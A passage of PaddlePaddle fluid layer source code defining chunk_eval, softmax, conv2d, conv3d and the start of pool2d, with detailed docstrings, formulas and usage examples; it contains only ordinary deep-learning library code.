IOE - 0 1 -
IOBES 0 1 2 3
Accordingly, in the above NER example, if the tagging scheme is IOB and chunk
types are ORG, PER and LOC, then the label ids would be as follows:
.. code-block:: python
B-ORG 0
I-ORG 1
B-PER 2
I-PER 3
B-LOC 4
I-LOC 5
O 6
With which we can map each label id to the corresponding tag type and chunk
type correctly.
Args:
input (Variable): A Tensor or LoDTensor, representing the predicted labels
from the network. When it is a Tensor, its shape would be `[N, M, 1]`,
where `N` stands for batch size, `M` for sequence length; When it is
a LoDTensor, its shape would be `[N, 1]` where `N` stands for the total
sequence lengths in this mini-batch. The data type should be int64.
label (Variable): A Tensor or LoDTensor representing the ground-truth labels.
It should have the same shape, lod and data type as ``input`` .
chunk_scheme (str): Indicate the tagging schemes used here. The value must
be IOB, IOE, IOBES or plain.
num_chunk_types (int): The number of chunk types.
excluded_chunk_types (list, optional): Indicate the chunk types shouldn't
be taken into account. It should be a list of chunk type ids(integer).
Default None.
seq_length(Variable, optional): A 1D Tensor containing the length of each
sequence when ``input`` and ``label`` are Tensor. It needn't be
provided if ``input`` and ``label`` are LoDTensor. Default None.
Returns:
tuple: A tuple including precision, recall, F1-score, chunk number detected, \
chunk number in ground-truth, chunk number correctly detected. Each \
is a Tensor with shape `[1]`. The data type of precision, recall and \
F1-score all is float32, and the others' data type all is int64.
Examples:
.. code-block:: python
import paddle.fluid as fluid
dict_size = 10000
label_dict_len = 7
sequence = fluid.data(
name='id', shape=[-1, 1], lod_level=1, dtype='int64')
embedding = fluid.embedding(
input=sequence, size=[dict_size, 512])
hidden = fluid.layers.fc(input=embedding, size=512)
label = fluid.layers.data(
name='label', shape=[1], lod_level=1, dtype='int32')
crf = fluid.layers.linear_chain_crf(
input=hidden, label=label, param_attr=fluid.ParamAttr(name="crfw"))
crf_decode = fluid.layers.crf_decoding(
input=hidden, param_attr=fluid.ParamAttr(name="crfw"))
fluid.layers.chunk_eval(
input=crf_decode,
label=label,
chunk_scheme="IOB",
num_chunk_types=(label_dict_len - 1) / 2)
"""
helper = LayerHelper("chunk_eval", **locals())
# prepare output
precision = helper.create_variable_for_type_inference(dtype="float32")
recall = helper.create_variable_for_type_inference(dtype="float32")
f1_score = helper.create_variable_for_type_inference(dtype="float32")
num_infer_chunks = helper.create_variable_for_type_inference(dtype="int64")
num_label_chunks = helper.create_variable_for_type_inference(dtype="int64")
num_correct_chunks = helper.create_variable_for_type_inference(
dtype="int64")
this_input = {"Inference": [input], "Label": [label]}
if seq_length:
this_input["SeqLength"] = [seq_length]
helper.append_op(
type="chunk_eval",
inputs=this_input,
outputs={
"Precision": [precision],
"Recall": [recall],
"F1-Score": [f1_score],
"NumInferChunks": [num_infer_chunks],
"NumLabelChunks": [num_label_chunks],
"NumCorrectChunks": [num_correct_chunks]
},
attrs={
"num_chunk_types": num_chunk_types,
"chunk_scheme": chunk_scheme,
"excluded_chunk_types": excluded_chunk_types or []
})
return (precision, recall, f1_score, num_infer_chunks, num_label_chunks,
num_correct_chunks)
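# Worked instance of the label-id mapping in the chunk_eval docstring (comments
# only): the IOB scheme has two tag types, so label id 3 (I-PER in the table)
# gives tag_type = 3 % 2 = 1 (Inside) and chunk_type = 3 // 2 = 1 (PER).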
def softmax(input, use_cudnn=False, name=None, axis=-1):
"""
This operator implements the softmax layer. The calculation process is as follows:
1. The dimension :attr:`axis` of the ``input`` will be permuted to the last.
2. Then the input tensor will be logically flattened to a 2-D matrix. The matrix's
second dimension(row length) is the same as the dimension :attr:`axis` of the input
tensor, and the first dimension(column length) is the product of all other
dimensions of the input tensor. For each row of the matrix, the softmax operator
squashes the K-dimensional(K is the width of the matrix, which is also the size
of the input tensor's dimension :attr:`axis`) vector of arbitrary real values to a
K-dimensional vector of real values in the range [0, 1] that add up to 1.
3. After the softmax operation is completed, the inverse operations of steps 1 and 2
are performed to restore the two-dimensional matrix to the same dimension as the ``input``.
    For each entry along the given axis, the operator computes the exponential of
    that entry and the sum of exponentials over the whole axis; the ratio of the
    two is the corresponding output of the softmax operator.
For each row :math:`i` and each column :math:`j` in the matrix, we have:
.. math::
        Out[i, j] = \\frac{\\exp(X[i, j])}{\\sum_j \\exp(X[i, j])}
Example:
.. code-block:: text
Case 1:
Input:
X.shape = [2, 3, 4]
X.data = [[[2.0, 3.0, 4.0, 5.0],
[3.0, 4.0, 5.0, 6.0],
[7.0, 8.0, 8.0, 9.0]],
[[1.0, 2.0, 3.0, 4.0],
[5.0, 6.0, 7.0, 8.0],
[6.0, 7.0, 8.0, 9.0]]]
Attrs:
axis = -1
Output:
Out.shape = [2, 3, 4]
Out.data = [[[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.07232949, 0.19661193, 0.19661193, 0.53444665]],
[[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426],
[0.0320586 , 0.08714432, 0.23688282, 0.64391426]]]
Case 2:
Input:
X.shape = [2, 3, 4]
X.data = [[[2.0, 3.0, 4.0, 5.0],
[3.0, 4.0, 5.0, 6.0],
[7.0, 8.0, 8.0, 9.0]],
[[1.0, 2.0, 3.0, 4.0],
[5.0, 6.0, 7.0, 8.0],
[6.0, 7.0, 8.0, 9.0]]]
Attrs:
axis = 1
Output:
Out.shape = [2, 3, 4]
Out.data = [[[0.00657326, 0.00657326, 0.01714783, 0.01714783],
[0.01786798, 0.01786798, 0.04661262, 0.04661262],
[0.97555875, 0.97555875, 0.93623955, 0.93623955]],
[[0.00490169, 0.00490169, 0.00490169, 0.00490169],
[0.26762315, 0.26762315, 0.26762315, 0.26762315],
[0.72747516, 0.72747516, 0.72747516, 0.72747516]]]
Args:
input (Variable): The input variable. A multi-dimension ``Tensor`` with type float32 or float64.
use_cudnn (bool, optional): Use cudnn kernel or not, it is valid only when the cudnn \
library is installed. To improve numerical stability, set use_cudnn to \
False by default.
        name (str, optional): The default value is None. Normally there is no need for user to set this
            property. For more information, please refer to :ref:`api_guide_Name` . Default: None.
axis (int, optional): The index of dimension to perform softmax calculations, it should
be in range :math:`[-1, rank - 1]`, while :math:`rank` is the rank of
input variable. Default: -1. -1 means the last dimension.
Returns:
Variable: ``Tensor`` indicates the output of softmax. The data type and shape are the same as ``input`` .
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.data(name="input", shape=[-1, 3],dtype="float32")
result = fluid.layers.softmax(data,axis=1)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
x = np.random.rand(3, 3).astype("float32")
output= exe.run(feed={"input": x},
fetch_list=[result[0]])
print(output)
"""
if in_dygraph_mode():
return core.ops.softmax(input, 'axis', axis, 'use_cudnn', use_cudnn)
inputs = {"X": [input]}
attrs = {"axis": axis, "use_cudnn": use_cudnn}
helper = LayerHelper('softmax', **locals())
check_variable_and_dtype(input, 'input', ['float16', 'float32', 'float64'],
'softmax')
dtype = helper.input_dtype()
softmax_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="softmax",
inputs={"X": input},
outputs={"Out": softmax_out},
attrs=attrs)
return softmax_out
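# Comment-only cross-check of the softmax computation described above, written
# with plain numpy as an illustration (not part of this module's API):
#   x = np.array([1.0, 2.0, 3.0])
#   e = np.exp(x - x.max())
#   e / e.sum()   # ~[0.09003057, 0.24472847, 0.66524096]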
def conv2d(input,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format="NCHW"):
"""
The convolution2D layer calculates the output based on the input, filter
and strides, paddings, dilations, groups parameters. Input and
Output are in NCHW or NHWC format, where N is batch size, C is the number of
channels, H is the height of the feature, and W is the width of the feature.
Filter is in MCHW format, where M is the number of output image channels,
C is the number of input image channels, H is the height of the filter,
and W is the width of the filter. If the groups is greater than 1,
C will equal the number of input image channels divided by the groups.
Please refer to UFLDL's `convolution
<http://ufldl.stanford.edu/tutorial/supervised/FeatureExtractionUsingConvolution/>`_
for more details.
If bias attribution and activation type are provided, bias is added to the
output of the convolution, and the corresponding activation function is
applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \\ast X + b)
Where:
* :math:`X`: Input value, a tensor with NCHW or NHWC format.
* :math:`W`: Filter value, a tensor with MCHW format.
* :math:`\\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D tensor with shape [M, 1].
* :math:`\\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H_{out}&= \\frac{(H_{in} + 2 * paddings[0] - (dilations[0] * (H_f - 1) + 1))}{strides[0]} + 1 \\\\
W_{out}&= \\frac{(W_{in} + 2 * paddings[1] - (dilations[1] * (W_f - 1) + 1))}{strides[1]} + 1
Args:
input (Variable): The input is 4-D Tensor with shape [N, C, H, W], the data type
of input is float16 or float32 or float64.
        num_filters(int): The number of filters. It is the same as the output
            image channels.
filter_size (int|tuple): The filter size. If filter_size
is a tuple, it must contain two integers, (filter_size_height,
filter_size_width). Otherwise, filter_size_height = filter_size_width =\
filter_size.
stride (int|tuple): The stride size. It means the stride in convolution.
If stride is a tuple, it must contain two integers, (stride_height, stride_width).
Otherwise, stride_height = stride_width = stride. Default: stride = 1.
padding (string|int|list|tuple): The padding size. It means the number of zero-paddings
on both sides for each dimension.If `padding` is a string, either 'VALID' or
'SAME' which is the padding algorithm. If padding size is a tuple or list,
it could be in three forms: `[pad_height, pad_width]` or
`[pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`, and when
`data_format` is `"NCHW"`, `padding` can be in the form `[[0,0], [0,0],
[pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
            when `data_format` is `"NHWC"`, `padding` can be in the form
`[[0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
dilation (int|tuple): The dilation size. It means the spacing between the kernel
points. If dilation is a tuple, it must contain two integers, (dilation_height,
dilation_width). Otherwise, dilation_height = dilation_width = dilation.
Default: dilation = 1.
groups (int): The groups number of the Conv2d Layer. According to grouped
convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1.
param_attr (ParamAttr|None): The parameter attribute for learnable parameters/weights
of conv2d. If it is set to None or one attribute of ParamAttr, conv2d
will create ParamAttr as param_attr. If the Initializer of the param_attr
is not set, the parameter is initialized with :math:`Normal(0.0, std)`,
and the :math:`std` is :math:`(\\frac{2.0 }{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool|None): The parameter attribute for the bias of conv2d.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv2d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn (bool): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True
act (str): Activation type, if it is set to None, activation is not appended.
Default: None
name(str|None): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
A Variable holding Tensor representing the conv2d, whose data type is the
same with input. If act is None, the tensor variable storing the convolution
result, and if act is not None, the tensor variable storing convolution
and non-linearity activation result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCHW" or "NHWC".
        ValueError: If the channel dimension of the input is less than or equal to zero.
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ShapeError: If the input is not 4-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels * groups.
        ShapeError: If the number of output channels is not divisible by groups.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
conv2d = fluid.layers.conv2d(input=data, num_filters=2, filter_size=3, act="relu")
"""
check_variable_and_dtype(input, 'input', ['float16', 'float32', 'float64'],
'conv2d')
num_channels = input.shape[1]
if not isinstance(use_cudnn, bool):
raise ValueError("Attr(use_cudnn) should be True or False. Received "
"Attr(use_cudnn): %s. " % str(use_cudnn))
if data_format not in ["NCHW", "NHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCHW' or 'NHWC'. Received "
"Attr(data_format): %s." % str(data_format))
channel_last = (data_format == "NHWC")
num_channels = input.shape[3] if channel_last else input.shape[1]
if num_channels < 0:
        raise ValueError(
            "The channel dimension of the input(%s) should be defined. "
            "Received: %s." % (str(input.shape), str(num_channels)))
assert param_attr is not False, "param_attr should not be False here."
l_type = 'conv2d'
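    # Use the specialized depthwise kernel only when every input channel is its
    # own group, the filter count is a multiple of the channel count, and cuDNN
    # is not requested; otherwise the generic conv2d op is used.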
if (num_channels == groups and num_filters % num_channels == 0 and
not use_cudnn):
l_type = 'depthwise_conv2d'
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype()
if groups is None:
num_filter_channels = num_channels
else:
if num_channels % groups != 0:
raise ValueError(
"the channel of input must be divisible by groups,"
"received: the channel of input is {}, the shape of input is {}"
", the groups is {}".format(num_channels, input.shape, groups))
num_filter_channels = num_channels // groups
filter_size = utils.convert_to_list(filter_size, 2, 'filter_size')
stride = utils.convert_to_list(stride, 2, 'stride')
dilation = utils.convert_to_list(dilation, 2, 'dilation')
# padding
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 4:
if is_list_or_tuple(padding[0]) and (data_format == "NCHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:4]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NHWC"):
if not (padding[0] == [0, 0] and padding[3] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:3]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 4, 'padding')
if utils._is_symmetric_padding(padding, 2):
padding = [padding[0], padding[2]]
else:
padding = utils.convert_to_list(padding, 2, 'padding')
return padding
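    # Illustrative normalizations performed by _update_padding (assumed values):
    #   2                                  -> [2, 2]
    #   [1, 2]                             -> [1, 2]   (pad_height, pad_width)
    #   [1, 1, 2, 2]                       -> [1, 2]   (symmetric collapse)
    #   [[0, 0], [0, 0], [1, 1], [2, 2]]   -> [1, 2]   (NCHW form)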
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'." %
str(padding))
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0]
padding = _update_padding(padding, data_format)
filter_shape = [num_filters, int(num_filter_channels)] + filter_size
def _get_default_param_initializer():
filter_elem_num = filter_size[0] * filter_size[1] * num_channels
std = (2.0 / filter_elem_num)**0.5
return Normal(0.0, std, 0)
filter_param = helper.create_parameter(
attr=helper.param_attr,
shape=filter_shape,
dtype=dtype,
default_initializer=_get_default_param_initializer())
pre_bias = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type=l_type,
inputs={
'Input': input,
'Filter': filter_param,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'use_mkldnn': False,
'fuse_relu_before_depthwise_conv': False,
"padding_algorithm": padding_algorithm,
"data_format": data_format,
})
if data_format == 'NCHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=3, dim_end=4)
return helper.append_activation(pre_act)
def conv3d(input,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format="NCDHW"):
"""
The convolution3D layer calculates the output based on the input, filter
and strides, paddings, dilations, groups parameters. Input(Input) and
    Output(Output) are in NCDHW or NDHWC format, where N is batch size, C is the number of
    channels, D is the depth of the feature, H is the height of the feature,
    and W is the width of the feature. Convolution3D is similar to Convolution2D
    but adds one dimension (depth). If bias attribution and activation type are
provided, bias is added to the output of the convolution, and the
corresponding activation function is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \\ast X + b)
In the above equation:
* :math:`X`: Input value, a tensor with NCDHW or NDHWC format.
* :math:`W`: Filter value, a tensor with MCDHW format.
* :math:`\\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D tensor with shape [M, 1].
* :math:`\\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, D_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, D_f, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, D_{out}, H_{out}, W_{out})`
Where
.. math::
D_{out}&= \\frac{(D_{in} + 2 * paddings[0] - (dilations[0] * (D_f - 1) + 1))}{strides[0]} + 1 \\\\
H_{out}&= \\frac{(H_{in} + 2 * paddings[1] - (dilations[1] * (H_f - 1) + 1))}{strides[1]} + 1 \\\\
W_{out}&= \\frac{(W_{in} + 2 * paddings[2] - (dilations[2] * (W_f - 1) + 1))}{strides[2]} + 1
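    For example (illustrative values): with D_in = H_in = W_in = 32, a 3 x 3 x 3 filter,
    stride 1, zero padding and dilation 1, each output spatial size is
    (32 + 2 * 0 - (1 * (3 - 1) + 1)) / 1 + 1 = 30.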
Args:
input (Variable): The input is 5-D Tensor with shape [N, C, D, H, W], the data
type of input is float16 or float32 or float64.
        num_filters(int): The number of filters. It is the same as the output
            image channels.
filter_size (int|tuple): The filter size. If filter_size is a tuple,
it must contain three integers, (filter_size_depth, filter_size_height,
filter_size_width). Otherwise, filter_size_depth = filter_size_height = \
filter_size_width = filter_size.
stride (int|tuple): The stride size. It means the stride in convolution. If stride is a
tuple, it must contain three integers, (stride_depth, stride_height, stride_width).
Otherwise, stride_depth = stride_height = stride_width = stride. Default: stride = 1.
padding (string|int|list|tuple): The padding size. It means the number of zero-paddings
on both sides for each dimension. If `padding` is a string, either 'VALID' or
'SAME' which is the padding algorithm. If padding size is a tuple or list,
it could be in three forms: `[pad_depth, pad_height, pad_width]` or
`[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `"NCDHW"`, `pool_padding` can be in the form
`[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `"NDHWC"`, `pool_padding` can be in the form
`[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
dilation (int|tuple): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain three integers, (dilation_depth, dilation_height,
dilation_width). Otherwise, dilation_depth = dilation_height = dilation_width = dilation.
Default: dilation = 1.
groups (int): The groups number of the Conv3d Layer. According to grouped
convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1
param_attr (ParamAttr|None): The parameter attribute for learnable parameters/weights
of conv3d. If it is set to None or one attribute of ParamAttr, conv3d
will create ParamAttr as param_attr. If it is set to None, the parameter
is initialized with :math:`Normal(0.0, std)`, and the :math:`std` is
:math:`(\\frac{2.0 }{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool|None): The parameter attribute for the bias of conv3d.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv3d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn (bool): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True
act (str): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str|None): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
            will be consistent with that of the input. An optional string from: `"NCDHW"`, `"NDHWC"`.
            The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
            `[batch_size, input_channels, input_depth, input_height, input_width]`.
Returns:
A Variable holding Tensor representing the conv3d, whose data type is
the same with input. If act is None, the tensor variable storing the
convolution result, and if act is not None, the tensor variable storing
convolution and non-linearity activation result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
        ValueError: If the channel dimension of the input is less than or equal to zero.
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ShapeError: If the input is not 5-D Tensor.
        ShapeError: If the input's dimension size and filter's dimension size are not equal.
        ShapeError: If the dimension size of input minus the size of `stride` is not 2.
        ShapeError: If the number of input channels is not equal to filter's channels * groups.
        ShapeError: If the number of output channels is not divisible by groups.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 12, 32, 32], dtype='float32')
conv3d = fluid.layers.conv3d(input=data, num_filters=2, filter_size=3, act="relu")
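            # A further, minimal sketch (shapes and names are illustrative): string
            # padding and the channel-last layout, both described in Args above.
            conv3d_same = fluid.layers.conv3d(
                input=data, num_filters=2, filter_size=3, padding="SAME", act="relu")
            data_ndhwc = fluid.data(
                name='data_ndhwc', shape=[None, 12, 32, 32, 3], dtype='float32')
            conv3d_ndhwc = fluid.layers.conv3d(
                input=data_ndhwc, num_filters=2, filter_size=3, data_format="NDHWC")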
"""
l_type = 'conv3d'
assert param_attr is not False, "param_attr should not be False here."
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype()
if not isinstance(use_cudnn, bool):
raise ValueError("Attr(use_cudnn) should be True or False. Received "
"Attr(use_cudnn): %s. " % str(use_cudnn))
if data_format not in ["NCDHW", "NDHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCDHW' or 'NDHWC'. Received "
"Attr(data_format): %s." % str(data_format))
channel_last = (data_format == "NDHWC")
num_channels = input.shape[4] if channel_last else input.shape[1]
if num_channels < 0:
        raise ValueError(
            "The channel dimension of the input(%s) should be defined. "
            "Received: %s." % (str(input.shape), str(num_channels)))
if groups is None:
num_filter_channels = num_channels
else:
if num_channels % groups != 0:
raise ValueError(
"The number of input channels must be divisible by Attr(groups). "
"Received: number of channels(%s), groups(%s)." %
(str(num_channels), str(groups)))
num_filter_channels = num_channels // groups
filter_size = utils.convert_to_list(filter_size, 3, 'filter_size')
stride = utils.convert_to_list(stride, 3, 'stride')
dilation = utils.convert_to_list(dilation, 3, 'dilation')
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 5:
if is_list_or_tuple(padding[0]) and (data_format == "NCDHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[2:5]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NDHWC"):
if not (padding[0] == [0, 0] and padding[4] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding))
padding = padding[1:4]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
elif is_list_or_tuple(padding) and len(padding) == 6:
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
else:
padding = utils.convert_to_list(padding, 3, 'padding')
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'." %
str(padding))
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0]
padding = _update_padding(padding, data_format)
input_shape = input.shape
filter_shape = [num_filters, num_filter_channels] + filter_size
def _get_default_param_initializer():
filter_elem_num = filter_size[0] * filter_size[1] * filter_size[
2] * num_channels
std = (2.0 / filter_elem_num)**0.5
return Normal(0.0, std, 0)
filter_param = helper.create_parameter(
attr=helper.param_attr,
shape=filter_shape,
dtype=dtype,
default_initializer=_get_default_param_initializer())
pre_bias = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type=l_type,
inputs={
'Input': input,
'Filter': filter_param,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'use_mkldnn': False,
"padding_algorithm": padding_algorithm,
"data_format": data_format,
})
if data_format == 'NCDHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=4, dim_end=5)
return helper.append_activation(pre_act)
@templatedoc()
def pool2d(input,
pool_size=-1,
pool_type="max",
pool_stride=1,
pool_padding=0,
global_pooling=False,
use_cudnn=True,
ceil_mode=False,
name=None,
exclusive=True,
data_format="NCHW"):
"""
${comment}
Args:
input (Variable): The input tensor of pooling operator which is a 4-D tensor with
shape [N, C, H, W]. The format of input tensor is `"NCHW"` or
`"NHWC"`, where `N` is batch size, `C` is the number of channels,
`H` is the height of the feature, and `W` is the width of the
            feature. The data type is float32 or float64.
pool_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain two integers, (pool_size_Height, pool_size_Width).
Otherwise, the pool kernel size will be a square of an int.
pool_type: ${pooling_type_comment}
pool_stride (int|list|tuple): The pool stride size. If pool stride size is a tuple or list,
it must contain two integers, (pool_stride_Height, pool_stride_Width).
Otherwise, the pool stride size will be a square of an int.
pool_padding (string|int|list|tuple): The pool padding. If `pool_padding` is a string, either 'VALID' or
'SAME' which is the padding algorithm. If pool padding size is a tuple or list,
it could be in three forms: `[pad_height, pad_width]` or
`[pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`, and when `data_format` is `"NCHW"`,
`pool_padding` can be in the form `[[0,0], [0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `"NHWC"`, `pool_padding` can be in the form
`[[0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Otherwise, the pool padding size will be a square of an int.
global_pooling (bool): ${global_pooling_comment}
use_cudnn (bool): ${use_cudnn_comment}
ceil_mode (bool): ${ceil_mode_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
exclusive (bool): Whether to exclude padding points in average pooling
mode, default is `true`.
        data_format (string): The data format of the input and output data. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
Variable: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `pool_type` is not "max" nor "avg".
ValueError: If `global_pooling` is False and `pool_size` is -1.
TypeError: If `use_cudnn` is not a bool value.
ValueError: If `data_format` is not "NCHW" or "NHWC".
ValueError: If `pool_padding` is a string, but not "SAME" or "VALID".
ValueError: If `pool_padding` is "VALID", but `ceil_mode` is True.
ValueError: If `pool_padding` is a list or tuple, but the elements in the batch or channel dimensions are non-zero.
ShapeError: If the input is not a 4-D or 5-D Tensor.
ShapeError: If the dimension of input minus the size of `pool_stride` is not 2.
ShapeError: If the size of `pool_size` and `pool_stride` is not equal.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
# max pool2d
pool2d = fluid.layers.pool2d(
input = data,
pool_size = 2,
pool_type = "max",
pool_stride = 1,
global_pooling=False)
# average pool2d
pool2d = fluid.layers.pool2d(
input = data,
pool_size = 2,
pool_type = "avg",
pool_stride = 1,
global_pooling=False)
# global average pool2d
pool2d = fluid.layers.pool2d(
input = data,
pool_size = 2,
pool_type = "avg",
pool_stride = 1,
global_pooling=True)
# Attr(pool_padding) is a list with 4 elements, Attr(data_format) is "NCHW".
out_1 = fluid.layers.pool2d(
input = data,
pool_size = 3,
pool_type = "avg",
pool_stride = 1,
pool_padding = [1, 2, 1, 0],
data_format = "NCHW")
# Attr(pool_padding) is a string, Attr(data_format) is "NCHW".
out_2 = fluid.layers.pool2d(
input = data,
pool_size = 3,
pool_type = "avg",
pool_stride = 1,
pool_padding = "VALID",
data_format = "NCHW")
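            # A further sketch (illustrative): 'SAME' padding combined with the
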